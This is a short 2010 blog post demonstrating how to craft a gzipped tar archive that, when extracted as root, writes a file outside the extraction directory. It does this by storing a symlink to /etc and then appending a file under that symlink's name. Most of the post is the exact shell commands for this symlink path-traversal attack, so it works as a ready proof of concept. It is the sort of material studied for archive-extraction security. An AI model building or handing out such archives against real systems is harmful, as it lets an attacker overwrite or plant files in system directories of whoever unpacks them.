A .tgz that bytes

The following creates a tar file that writes stuff (/etc/yourpasswd in this case) outside the directory where it is extracted:

touch foo.c bar.c Makefile
ln -s /etc info                      # tar can do symbolic links
tar cf src.tar *.c Makefile info
rm info
mkdir info
touch info/yourpasswd                # where does this extract?
tar rf src.tar info/yourpasswd       # tar can extend archives
gzip -9 src.tar

This of course only works when tar zxf is run as root, but that is not unheard of, right?

Mon, 06 Sep 2010
[/projects] permanent link